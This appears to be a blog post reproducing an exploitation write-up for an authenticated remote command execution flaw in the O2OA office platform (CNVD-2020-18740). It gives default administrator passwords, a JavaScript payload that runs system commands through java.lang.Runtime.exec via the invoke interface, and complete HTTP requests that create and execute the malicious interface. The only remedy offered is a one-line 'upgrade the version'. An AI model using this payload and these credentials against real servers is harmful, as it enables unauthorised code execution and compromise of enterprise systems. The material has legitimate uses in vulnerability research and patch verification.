banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

O2OA backend remote command execution vulnerability

Vulnerability Overview

O2OA is an open-source and free enterprise and team office platform that provides four major platforms: portal management, process management, information management, and data management. It integrates multiple functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration to meet various management and collaboration needs of enterprises. The O2OA system has a remote code execution vulnerability in the invoke interface. Attackers can exploit this vulnerability to execute arbitrary code.

Scope of Impact

Title: "O2OA"
CNVD-2020-18740

Exploitation Process

Pull the environment using Docker

docker pull oxnme/o2oa:6.1.3

docker run --name o2server -p 80:80 -p 20010:20010 -p 20020:20020 -p 20030:20030 -d o2oa/o2server

Weak password: xadmin/o2oa@2022

After setting up the environment, directly access port 8001 through a browser, and it will automatically redirect to the O2OA login page.

http://192.168.31.151:8001/x_desktop/index.html

image

Enter the default password, xadmin/o2, to log in successfully.

Note: The default password for the new version of O2OA is: xadmin/o2oa@2022

image

Find service management

image

Add interface configuration

image

Enter the content of the execution command as follows.

var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));

var result = [];
while (true) {
    var oneline = bufReader.readLine();
    result.push(oneline);
    if (!oneline) break;
}
var result = { "Result": result };
this.response.setBody(result, "application/json"); 

image

You can also create interface configuration through the following request package.

image

The request package is as follows:

POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n    var oneline = bufReader.readLine();\n    result.push(oneline);\n    if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}

Execute the command directly.

image

The request package is as follows:

POST 192.168.31.151:20030/x_program_center/jaxrs/invoke/cmd/execute
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n    var oneline = bufReader.readLine();\n    result.push(oneline);\n    if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}

Different commands require creating different interface configurations.

Recommended Fixes

Upgrade the version

References

http://wiki.peiqi.tech/wiki/oa/O2OA/O2OA%20invoke%20%E5%90%8E%E5%8F%B0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CNVD-2020-18740.html

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.